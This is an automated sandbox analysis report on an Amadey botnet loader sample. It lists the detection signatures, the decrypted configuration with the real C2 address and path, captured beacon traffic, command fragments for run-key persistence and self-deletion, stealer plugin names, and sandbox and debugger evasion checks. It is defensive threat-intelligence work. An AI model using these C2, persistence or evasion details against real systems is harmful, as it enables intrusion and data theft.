Windows Analysis Report
FQSn6sSfgS.exe

Overview

General Information

Sample name: FQSn6sSfgS.exe
renamed because original name is a hash value
Original sample name: a94a566ea4b5f8633c6456e9a9eb3c19.exe
Analysis ID: 1611798
MD5: a94a566ea4b5f8633c6456e9a9eb3c19
SHA1: ddc811cb100ccbfd1f5335975d98709994c58d63
SHA256: 68aa37b3484ca101e4e3cae98c9a4abd792a17ad944cd7b13413b5c4a056caa8
Tags: exe, user-abuse_ch

Detection

Amadey
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

[Classification chart. Axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Scale: clean, suspicious, malicious.]

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection

Source: FQSn6sSfgS.exe Avira: detected
Source: http://185.215.113.43/Zu7JuNko/index.php3 Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php-?# Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpS Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpqe Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpsoft Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php% Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpbc1985 Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php_ Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpqYo30zpOYVp Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php? Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpG Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php40f1-ac21-573d1d5ce43fLMEMp Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpk Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 57%
Source: FQSn6sSfgS.exe Virustotal: Detection: 48%
Source: FQSn6sSfgS.exe ReversingLabs: Detection: 57%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: FQSn6sSfgS.exe Joe Sandbox ML: detected
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: 185.215.113.43
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: /Zu7JuNko/index.php
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: S-%lu-
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: abc3bc1985
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: skotes.exe
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: Startup
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: cmd /C RMDIR /s/q
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: rundll32
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: Programs
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: %USERPROFILE%
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: cred.dll|clip.dll|
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: cred.dll
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: clip.dll
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: http://
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: https://
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: /quiet
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: /Plugins/
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: &unit=
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: shell32.dll
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: kernel32.dll
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: GetNativeSystemInfo
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: ProgramData\
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: AVAST Software
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: Kaspersky Lab
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: Panda Security
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: Doctor Web
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: 360TotalSecurity
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: Bitdefender
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: Norton
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: Sophos
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: Comodo
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: WinDefender
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: 0123456789
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: ------
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: ?scr=1
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: ComputerName
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: -unicode-
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: VideoID
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: DefaultSettings.XResolution
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: DefaultSettings.YResolution
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: ProductName
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: CurrentBuild
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: rundll32.exe
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: "taskkill /f /im "
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: " && timeout 1 && del
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: && Exit"
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: " && ren
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: Powershell.exe
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: -executionpolicy remotesigned -File "
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: shutdown -s -t 0
Source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp String decryptor: random
Source: FQSn6sSfgS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:50002 -> 185.215.113.43:80
Source: Malware configuration extractor IPs: 185.215.113.43
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: Joe Sandbox View IP Address: 185.215.113.43
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009DBE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_009DBE30
Source: unknown HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: skotes.exe, 00000006.00000002.3400789012.000000000138D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php

System Summary

Source: FQSn6sSfgS.exe Static PE information: section name:
Source: FQSn6sSfgS.exe Static PE information: section name: .idata
Source: FQSn6sSfgS.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A178BB 6_2_00A178BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A18860 6_2_00A18860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A17049 6_2_00A17049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A131A8 6_2_00A131A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009D4DE0 6_2_009D4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009DE530 6_2_009DE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A12D10 6_2_00A12D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A1779B 6_2_00A1779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A07F36 6_2_00A07F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009D4B30 6_2_009D4B30
Source: FQSn6sSfgS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: FQSn6sSfgS.exe Static PE information: Section: cyzefahx ZLIB complexity 0.994040241570113
Source: skotes.exe.0.dr Static PE information: Section: cyzefahx ZLIB complexity 0.994040241570113
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: FQSn6sSfgS.exe Virustotal: Detection: 48%
Source: FQSn6sSfgS.exe ReversingLabs: Detection: 57%
Source: FQSn6sSfgS.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File read: C:\Users\user\Desktop\FQSn6sSfgS.exe
Source: unknown Process created: C:\Users\user\Desktop\FQSn6sSfgS.exe "C:\Users\user\Desktop\FQSn6sSfgS.exe"
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: FQSn6sSfgS.exe Static file information: File size 2165248 > 1048576
Source: FQSn6sSfgS.exe Static PE information: Raw size of cyzefahx is bigger than: 0x100000 < 0x1a4c00

Data Obfuscation

Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Unpacked PE file: 0.2.FQSn6sSfgS.exe.e00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cyzefahx:EW;fhvyawnr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cyzefahx:EW;fhvyawnr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.9d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cyzefahx:EW;fhvyawnr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cyzefahx:EW;fhvyawnr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 3.2.skotes.exe.9d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cyzefahx:EW;fhvyawnr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cyzefahx:EW;fhvyawnr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.9d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cyzefahx:EW;fhvyawnr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cyzefahx:EW;fhvyawnr:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: skotes.exe.0.dr Static PE information: real checksum: 0x21cc52 should be: 0x21543c
Source: FQSn6sSfgS.exe Static PE information: real checksum: 0x21cc52 should be: 0x21543c
Source: FQSn6sSfgS.exe Static PE information: section name:
Source: FQSn6sSfgS.exe Static PE information: section name: .idata
Source: FQSn6sSfgS.exe Static PE information: section name:
Source: FQSn6sSfgS.exe Static PE information: section name: cyzefahx
Source: FQSn6sSfgS.exe Static PE information: section name: fhvyawnr
Source: FQSn6sSfgS.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: cyzefahx
Source: skotes.exe.0.dr Static PE information: section name: fhvyawnr
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009ED91C push ecx; ret 6_2_009ED92F
Source: FQSn6sSfgS.exe Static PE information: section name: entropy: 7.025630492302739
Source: FQSn6sSfgS.exe Static PE information: section name: cyzefahx entropy: 7.952113015477968
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.025630492302739
Source: skotes.exe.0.dr Static PE information: section name: cyzefahx entropy: 7.952113015477968
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Boot Survival

Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FD6E88 second address: FD6EAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Bh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB19901BD0Dh 0x00000010 popad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FD6EAC second address: FD6EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FD6EB0 second address: FD6EBA instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB19901BD06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FD6EBA second address: FD6ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB19901BDE4h 0x0000000d rdtsc
